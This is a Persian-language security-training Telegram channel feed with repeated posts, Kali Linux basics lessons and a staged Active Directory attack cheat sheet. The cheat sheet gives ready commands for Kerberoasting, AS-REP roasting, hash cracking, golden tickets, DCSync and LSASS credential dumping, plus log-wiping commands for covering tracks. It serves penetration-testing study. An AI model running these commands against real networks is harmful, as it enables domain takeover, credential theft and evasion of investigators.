@TryHackBox| احسان آخوندی
#pwk #CyberSecurity
⚡4👍3❤2
Active Directory attack Cheat sheet
(جمعآوری اطلاعات)
استفاده از ابزارهای:
BloodHound + SharpHound برای تحلیل گرافی
PowerView برای Enumeration:
Get-NetUser برای لیست کاربران
Get-NetGroup برای لیست گروهها
Get-NetComputer برای لیست کامپیوترها
AdFind.exe:
مثال: AdFind.exe -f "(objectcategory=person)"
ldapsearch روی لینوکس یا Kali
چک کردن Trust بین دامنهها (Get-NetDomainTrust)
🚪 مرحله ۲: Initial Access (دسترسی اولیه)
فیشینگ، فایل مخرب، دسترسی از طریق آسیبپذیریها
اکسپلویتهایی مثل:
Zerologon (CVE-2020-1472)
PetitPotam برای NTLM Relay
حمله به سرویسهای داخلی:
SMB Signing Disabled → Relay Attacks
NTLM Authentication Abuse
استفاده از Impacket برای اجرای ntlmrelayx.py
@TryHackBox | arian momeni
(جمعآوری اطلاعات)
استفاده از ابزارهای:
BloodHound + SharpHound برای تحلیل گرافی
PowerView برای Enumeration:
Get-NetUser برای لیست کاربران
Get-NetGroup برای لیست گروهها
Get-NetComputer برای لیست کامپیوترها
AdFind.exe:
مثال: AdFind.exe -f "(objectcategory=person)"
ldapsearch روی لینوکس یا Kali
چک کردن Trust بین دامنهها (Get-NetDomainTrust)
🚪 مرحله ۲: Initial Access (دسترسی اولیه)
فیشینگ، فایل مخرب، دسترسی از طریق آسیبپذیریها
اکسپلویتهایی مثل:
Zerologon (CVE-2020-1472)
PetitPotam برای NTLM Relay
حمله به سرویسهای داخلی:
SMB Signing Disabled → Relay Attacks
NTLM Authentication Abuse
استفاده از Impacket برای اجرای ntlmrelayx.py
@TryHackBox | arian momeni
👍7
How AI Impacts Cloud Security.pdf
7.6 MB
#AI #Cloud_Security
🔖 هوش مصنوعی و امنیت کلاد
⭕ رشد ناگهانی ابزارهای هوش مصنوعی پیشرفته (GenAI) در سال گذشته باعث شده هوش مصنوعی به مرکز توجه صنعت فناوری و افکار عمومی تبدیل شود. فناوری هوش مصنوعی نقشی مهم در بخش فناوری داشته، به ویژه در حوزه امنیت کلاد یا ابری. بازار امنیت کلاد به سرعت در حال رشد است و قابلیت های هوش مصنوعی حالا عامل تعیین کننده ای هنگام انتخاب راه حل امنیت کلاد توسط شرکت ها محسوب میشود.
@TryHackBox | Group | Github | YouTube
🔖 هوش مصنوعی و امنیت کلاد
⭕ رشد ناگهانی ابزارهای هوش مصنوعی پیشرفته (GenAI) در سال گذشته باعث شده هوش مصنوعی به مرکز توجه صنعت فناوری و افکار عمومی تبدیل شود. فناوری هوش مصنوعی نقشی مهم در بخش فناوری داشته، به ویژه در حوزه امنیت کلاد یا ابری. بازار امنیت کلاد به سرعت در حال رشد است و قابلیت های هوش مصنوعی حالا عامل تعیین کننده ای هنگام انتخاب راه حل امنیت کلاد توسط شرکت ها محسوب میشود.
@TryHackBox | Group | Github | YouTube
🔥5
Try Hack Box
Active Directory attack Cheat sheet (جمعآوری اطلاعات) استفاده از ابزارهای: BloodHound + SharpHound برای تحلیل گرافی PowerView برای Enumeration: Get-NetUser برای لیست کاربران Get-NetGroup برای لیست گروهها Get-NetComputer برای لیست کامپیوترها AdFind.exe:…
🧨 مرحله ۳: Privilege Escalation (ارتقاء دسترسی)
Kerberoasting:
گرفتن TGS Hash:
GetUserSPNs.py domain/user:pass@dc-ip -outputfile hashes.txt
کرک با hashcat:
hashcat -m 13100 hashes.txt rockyou.txt
AS-REP Roasting:
اگر کاربر نیاز به pre-auth نداشته باشه:
GetNPUsers.py domain/ -usersfile users.txt -format hashcat
Unconstrained Delegation یا Privilege Misconfigurations
ACL Abuse با PowerView → پیدا کردن کاربرهایی که روی objectهای مهم کنترل دارند
@TryHackBox | arian momeni
Kerberoasting:
گرفتن TGS Hash:
GetUserSPNs.py domain/user:pass@dc-ip -outputfile hashes.txt
کرک با hashcat:
hashcat -m 13100 hashes.txt rockyou.txt
AS-REP Roasting:
اگر کاربر نیاز به pre-auth نداشته باشه:
GetNPUsers.py domain/ -usersfile users.txt -format hashcat
Unconstrained Delegation یا Privilege Misconfigurations
ACL Abuse با PowerView → پیدا کردن کاربرهایی که روی objectهای مهم کنترل دارند
@TryHackBox | arian momeni
❤5⚡1
Try Hack Box
🧨 مرحله ۳: Privilege Escalation (ارتقاء دسترسی) Kerberoasting: گرفتن TGS Hash: GetUserSPNs.py domain/user:pass@dc-ip -outputfile hashes.txt کرک با hashcat: hashcat -m 13100 hashes.txt rockyou.txt AS-REP Roasting: اگر کاربر نیاز به pre-auth نداشته باشه:…
🧬 مرحله ۴: Persistence (پایداری)
Golden Ticket:
ساختن با Mimikatz:
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-... /krbtgt:<hash>
Skeleton Key (موقعی که به DC دسترسی داریم)
SIDHistory Injection
Abuse کردن AdminSDHolder یا GPO برای حفظ دسترسی
🔁 مرحله ۵: Lateral Movement (حرکت جانبی)
تکنیکهای کلیدی:
Pass-the-Hash
Pass-the-Ticket
Overpass-the-Hash
استفاده از WMI / PsExec / WinRM برای اجرای ریموت
ابزارهای:
wmiexec.py
PsExec.exe
CrackMapExec (لینوکس)
SharpExec.exe یا PowerShell Remoting
🏰 مرحله ۶: Domain Controller Compromise
DCSync Attack با Mimikatz:
lsadump::dcsync /domain:domain.local /user:krbtgt
DCShadow Attack
Dump LSASS با Procdump:
procdump -ma lsass.exe lsass.dmp
و استخراج رمزها با Mimikatz:
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
🪖مرحله ۷: Exfiltration & Cleanup
Exfiltration با SMB، DNS Tunneling یا ابزارهایی مثل Rclone
حذف لاگ:
wevtutil cl Security
del *.evtx
پوشاندن ردپاها با ابزارهای پاکسازی (مثلاً Invoke-Phant0m.ps1)
نویسنده
@TryHackBox | arian momeni
Golden Ticket:
ساختن با Mimikatz:
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-... /krbtgt:<hash>
Skeleton Key (موقعی که به DC دسترسی داریم)
SIDHistory Injection
Abuse کردن AdminSDHolder یا GPO برای حفظ دسترسی
🔁 مرحله ۵: Lateral Movement (حرکت جانبی)
تکنیکهای کلیدی:
Pass-the-Hash
Pass-the-Ticket
Overpass-the-Hash
استفاده از WMI / PsExec / WinRM برای اجرای ریموت
ابزارهای:
wmiexec.py
PsExec.exe
CrackMapExec (لینوکس)
SharpExec.exe یا PowerShell Remoting
🏰 مرحله ۶: Domain Controller Compromise
DCSync Attack با Mimikatz:
lsadump::dcsync /domain:domain.local /user:krbtgt
DCShadow Attack
Dump LSASS با Procdump:
procdump -ma lsass.exe lsass.dmp
و استخراج رمزها با Mimikatz:
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
🪖مرحله ۷: Exfiltration & Cleanup
Exfiltration با SMB، DNS Tunneling یا ابزارهایی مثل Rclone
حذف لاگ:
wevtutil cl Security
del *.evtx
پوشاندن ردپاها با ابزارهای پاکسازی (مثلاً Invoke-Phant0m.ps1)
نویسنده
@TryHackBox | arian momeni
❤7
مقدمه: آشنایی با کالی لینوکس: قسمت چهارم جستجو در فایلها و مدیریت سرویسها
1.جستجو در فایل ها
برای پیدا کردن فایلها، سه ابزار اصلی وجود دارد:
- which: مسیر کامل یک دستور اجرایی را در متغیر محیطی
- locate: سریعترین ابزار جستجو که از یک دیتابیس داخلی استفاده میکند. این دیتابیس با دستور
- find: قدرتمندترین و انعطافپذیرترین ابزار جستجو که میتواند بر اساس معیارهای مختلفی مانند نام، اندازه، مالک و زمان جستجو کند.
مثال:
برای جستجوی فایلی با نام "passwords.txt" با
برای جستجوی فایلی که نامش با "conf" شروع میشود در دایرکتوری
2.مدیریت سرویسها و ابزارها
برای حفظ یک پروفایل امنیتی پایین، سرویسهای شبکه مانند SSH و HTTP به صورت پیشفرض در کالی غیرفعال هستند. برای مدیریت آنها از دستور
مثال:
برای شروع سرویس SSH که به صورت پیشفرض روی پورت 22 گوش میدهد:
برای فعال کردن آن جهت راهاندازی خودکار هنگام بوت:
2.1.راهاندازی سرویس HTTP در کالی لینوکس
در کالی لینوکس، سرویس HTTP (Apache) به صورت پیشفرض غیرفعال است تا امنیت سیستم حفظ شود. برای راهاندازی و مدیریت این سرویس، از ابزار
شروع سرویس HTTP
برای شروع سرویس HTTP به صورت موقت در ترمینال، از دستور زیر استفاده کنید:
بعد از اجرای این دستور، سرویس HTTP روی پورت پیشفرض 80 شروع به کار میکند.
بررسی وضعیت سرویس
برای اطمینان از اینکه سرویس به درستی فعال شده است، میتوانید وضعیت آن را با دستور زیر بررسی کنید:
اگر سرویس فعال باشد، خروجی نشان میدهد که
2.2.فعال کردن بوت خودکار
اگر میخواهید سرویس HTTP هر بار که سیستم را روشن میکنید به صورت خودکار راهاندازی شود، باید آن را فعال (enable) کنید. این کار باعث میشود سرویس در زمان بوت سیستم به صورت خودکار اجرا شود.
برای فعال کردن بوت خودکار سرویس HTTP، دستور زیر را در ترمینال وارد کنید:
با اجرای این دستور، یک لینک نمادین (symlink) ایجاد میشود که تضمین میکند سرویس در فرآیند راهاندازی سیستم، شروع به کار کند. از این پس، هر بار که کالی لینوکس را روشن میکنید، سرویس HTTP به صورت خودکار فعال خواهد بود.
در آینده برای غیرفعال کردن بوت خودکار، کافیست از گزینه
✍️نویسنده
@TryHackBox| احسان آخوندی
#pwk #CyberSecurity
1.جستجو در فایل ها
برای پیدا کردن فایلها، سه ابزار اصلی وجود دارد:
- which: مسیر کامل یک دستور اجرایی را در متغیر محیطی
PATH پیدا میکند.- locate: سریعترین ابزار جستجو که از یک دیتابیس داخلی استفاده میکند. این دیتابیس با دستور
updatedb بهروزرسانی میشود.- find: قدرتمندترین و انعطافپذیرترین ابزار جستجو که میتواند بر اساس معیارهای مختلفی مانند نام، اندازه، مالک و زمان جستجو کند.
مثال:
برای جستجوی فایلی با نام "passwords.txt" با
locate:locate passwords.txt
برای جستجوی فایلی که نامش با "conf" شروع میشود در دایرکتوری
/etc با find:find /etc -name "conf*"
2.مدیریت سرویسها و ابزارها
برای حفظ یک پروفایل امنیتی پایین، سرویسهای شبکه مانند SSH و HTTP به صورت پیشفرض در کالی غیرفعال هستند. برای مدیریت آنها از دستور
systemctl استفاده میکنیم.مثال:
برای شروع سرویس SSH که به صورت پیشفرض روی پورت 22 گوش میدهد:
sudo systemctl start ssh
برای فعال کردن آن جهت راهاندازی خودکار هنگام بوت:
sudo systemctl enable ssh
2.1.راهاندازی سرویس HTTP در کالی لینوکس
در کالی لینوکس، سرویس HTTP (Apache) به صورت پیشفرض غیرفعال است تا امنیت سیستم حفظ شود. برای راهاندازی و مدیریت این سرویس، از ابزار
systemctl استفاده میکنیم.شروع سرویس HTTP
برای شروع سرویس HTTP به صورت موقت در ترمینال، از دستور زیر استفاده کنید:
sudo systemctl start apache2
sudo: این دستور اجازه میدهد تا با دسترسی کاربر روت این دستور را اجرا کنیدsystemctl: ابزاری برای کنترل سرویسهای سیستمی در لینوکسapache2: نام سرویس HTTPدر کالی.بعد از اجرای این دستور، سرویس HTTP روی پورت پیشفرض 80 شروع به کار میکند.
بررسی وضعیت سرویس
برای اطمینان از اینکه سرویس به درستی فعال شده است، میتوانید وضعیت آن را با دستور زیر بررسی کنید:
sudo systemctl status apache2
اگر سرویس فعال باشد، خروجی نشان میدهد که
active (running) است.2.2.فعال کردن بوت خودکار
اگر میخواهید سرویس HTTP هر بار که سیستم را روشن میکنید به صورت خودکار راهاندازی شود، باید آن را فعال (enable) کنید. این کار باعث میشود سرویس در زمان بوت سیستم به صورت خودکار اجرا شود.
برای فعال کردن بوت خودکار سرویس HTTP، دستور زیر را در ترمینال وارد کنید:
sudo systemctl enable apache2
با اجرای این دستور، یک لینک نمادین (symlink) ایجاد میشود که تضمین میکند سرویس در فرآیند راهاندازی سیستم، شروع به کار کند. از این پس، هر بار که کالی لینوکس را روشن میکنید، سرویس HTTP به صورت خودکار فعال خواهد بود.
در آینده برای غیرفعال کردن بوت خودکار، کافیست از گزینه
disable استفاده کنید:sudo systemctl disable apache2
✍️نویسنده
@TryHackBox| احسان آخوندی
#pwk #CyberSecurity
1👍8❤3
مقدمه: قسمت پنجم: آشنایی با کالی لینوکس: مدیریت بستهها و برنامهها و لینک های مفید برای یادگیری بیشتر
مدیریت بستهها و برنامهها
برای مدیریت بستهها یا برنامهها، از مجموعه ابزارهای APT (Advanced Package Tool) استفاده میشود که وابستگیهای برنامهها را به صورت هوشمند مدیریت میکند.
*
*
*
*
مثال:
برای نصب برنامه pure-ftpd:
برای حذف کامل آن:
مثال:
برای نصب یک فایل بستهی .deb که از قبل دانلود شده است:
منابع آموزشی و مستندات
1. سایت ابزارهای کالی (Kali Tools Site): لیستی از ابزارها و اطلاعات آنها.
Kali Tools
2. Bug Tracker: برای گزارش و یافتن راهحل باگها.
Kali Linux Bug Tracker
3. سایت آموزشی کالی (Kali Linux Training Site): شامل کتاب Kali Linux Revealed، تمرینات و فروم پشتیبانی برای کاربران تمام سطوح.
Kali Training
این منابع رایگان، بینشی ارزشمند را فراهم میکنند و به عنوان یک همراه عالی برای آموزش عمل خواهند کرد.
✍️نویسنده
@TryHackBox| احسان آخوندی
#pwk #CyberSecurity
مدیریت بستهها و برنامهها
برای مدیریت بستهها یا برنامهها، از مجموعه ابزارهای APT (Advanced Package Tool) استفاده میشود که وابستگیهای برنامهها را به صورت هوشمند مدیریت میکند.
*
apt update: لیست بستهها را بهروز میکند.*
apt upgrade: تمام بستههای نصبشده را ارتقاء میدهد. قبل از این کار، بهتر است از ماشین مجازی خود یک اسنپشات (Snapshot) بگیرید.*
apt install: برای نصب یک بسته جدید.*
apt remove --purge: یک بسته را به طور کامل همراه با فایلهای پیکربندی حذف میکند.مثال:
برای نصب برنامه pure-ftpd:
sudo apt install pure-ftpd
برای حذف کامل آن:
sudo apt remove --purge pure-ftpd
dpkg ابزار اصلی و پایه برای نصب بستههاست که میتواند در حالت آفلاین نیز کار کند، اما وابستگیهای برنامه را به صورت خودکار نصب نمیکند.مثال:
برای نصب یک فایل بستهی .deb که از قبل دانلود شده است:
sudo dpkg -i package.deb
منابع آموزشی و مستندات
1. سایت ابزارهای کالی (Kali Tools Site): لیستی از ابزارها و اطلاعات آنها.
Kali Tools
2. Bug Tracker: برای گزارش و یافتن راهحل باگها.
Kali Linux Bug Tracker
3. سایت آموزشی کالی (Kali Linux Training Site): شامل کتاب Kali Linux Revealed، تمرینات و فروم پشتیبانی برای کاربران تمام سطوح.
Kali Training
این منابع رایگان، بینشی ارزشمند را فراهم میکنند و به عنوان یک همراه عالی برای آموزش عمل خواهند کرد.
✍️نویسنده
@TryHackBox| احسان آخوندی
#pwk #CyberSecurity
Kali Linux
Kali Tools | Kali Linux Tools
Home of Kali Linux, an Advanced Penetration Testing Linux distribution used for Penetration Testing, Ethical Hacking and network security assessments.
👍7